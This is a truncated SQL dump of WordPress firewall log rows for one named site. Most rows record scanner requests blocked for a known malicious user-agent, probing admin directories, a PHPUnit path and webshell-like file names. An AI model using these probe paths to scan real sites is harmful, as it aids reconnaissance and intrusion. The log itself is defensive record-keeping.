User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL3VwbG9hZC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(133204,1699888473.370964,1699888473.361700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wordpress/wp-admin/includes','http://eckankar-colorado.org/wordpress/wp-admin/includes','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1hZG1pbi9pbmNsdWRlcw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133207,1699888472.030273,1699888472.008200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/.well-known/acme-challenge/','http://eckankar-colorado.org/.well-known/acme-challenge/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly53ZWxsLWtub3duL2FjbWUtY2hhbGxlbmdlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133208,1699888214.439513,1699888214.430400,0x00000000000000000000FFFFC2261647,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/themes/optimizepress/lib/admin/media-upload.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL29wdGltaXplcHJlc3MvbGliL2FkbWluL21lZGlhLXVwbG9hZC5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133206,1699888472.525648,1699888472.516900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','http://eckankar-colorado.org/vendor/phpunit/phpunit/src/Util/PHP/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci9waHB1bml0L3BocHVuaXQvc3JjL1V0aWwvUEhQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133205,1699888473.024600,1699888473.015100,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-admin/','http://eckankar-colorado.org/wp-admin/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWFkbWluLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133173,1699888485.822492,1699888485.813700,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-category.php','http://eckankar-colorado.org/wp-includes/class-walker-category.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1jYXRlZ29yeS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133171,1699888486.532963,1699888486.524000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-nav-menu.php','http://eckankar-colorado.org/wp-includes/class-walker-nav-menu.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1uYXYtbWVudS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133172,1699888486.152617,1699888486.143900,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-walker-comment.php','http://eckankar-colorado.org/wp-includes/class-walker-comment.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdhbGtlci1jb21tZW50LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(133164,1699888489.003103,1699888488.993800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-list.php','http://eckankar-colorado.org/wp-includes/class-wp-block-list.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLWxpc3QucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133154,1699888492.527982,1699888492.519200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-type.php','http://eckankar-colorado.org/wp-includes/class-wp-block-type.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXR5cGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133155,1699888492.198124,1699888492.189200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-block-type-registry.php','http://eckankar-colorado.org/wp-includes/class-wp-block-type-registry.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWJsb2NrLXR5cGUtcmVnaXN0cnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133592,1699888542.674153,1699888542.665400,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/ms-functions.php','http://eckankar-colorado.org/wp-includes/ms-functions.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL21zLWZ1bmN0aW9ucy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134683,0.000000,1700172407.437979,0x00000000000000000000FFFF2D836CA4,0,200,0,0,0,'https://eckankar-colorado.org/wp-login.php','','Mozilla/5.0','loginFailInvalidUsername',NULL,NULL),(134684,1700172567.808619,1700172567.792700,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/sodium_compat/autoload-php7.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3NvZGl1bV9jb21wYXQvYXV0b2xvYWQtcGhwNy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134679,1700171700.753954,1700171700.732600,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts/class-wp-font-face.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzL2NsYXNzLXdwLWZvbnQtZmFjZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(134669,1700169755.567925,1700169755.546200,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQv\",\"category\":\"brute-force\",\"ssl\":1}'),(134672,1700170313.189111,1700170313.180400,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/fonts.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ZvbnRzLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(134670,1700169962.591158,1700169962.569400,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(134677,1700171267.554463,1700171267.545800,0x00000000000000000000FFFF5B5CFF14,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-supports/background.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2NrLXN1cHBvcnRzL2JhY2tncm91bmQucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133084,1699795933.001287,1699795932.992400,0x00000000000000000000FFFFC2A9AF5D,0,403,0,0,0,'https://eckankar-colorado.org/simple.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpbXBsZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133107,1699825268.363082,1699825268.353800,0x00000000000000000000FFFF2E142EC6,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/WordPressCore/include.php','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9Xb3JkUHJlc3NDb3JlL2luY2x1ZGUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133139,1699888498.523401,1699888498.514800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-duotone.php','http://eckankar-colorado.org/wp-includes/class-wp-duotone.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWR1b3RvbmUucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133140,1699888498.103439,1699888498.093300,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-dependency.php','http://eckankar-colorado.org/wp-includes/class-wp-dependency.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWRlcGVuZGVuY3kucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133141,1699888497.667964,1699888497.659200,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-dependencies.php','http://eckankar-colorado.org/wp-includes/class-wp-dependencies.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWRlcGVuZGVuY2llcy5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(133142,1699888497.283506,1699888497.274800,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/class-wp-date-query.php','http://eckankar-colorado.org/wp-includes/class-wp-date-query.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2NsYXNzLXdwLWRhdGUtcXVlcnkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(133224,1699888686.646787,1699888686.638000,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-content/plugins/wpeazvp/','http://eckankar-colorado.org/wp-content/plugins/wpeazvp/','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cGVhenZwLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(133198,1699888476.784210,1699888476.775500,0x00000000000000000000FFFF2D89CB43,0,403,0,0,0,'https://eckankar-colorado.org/wp-includes/block-patterns.php','http://eckankar-colorado.org/wp-includes/block-patterns.php','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 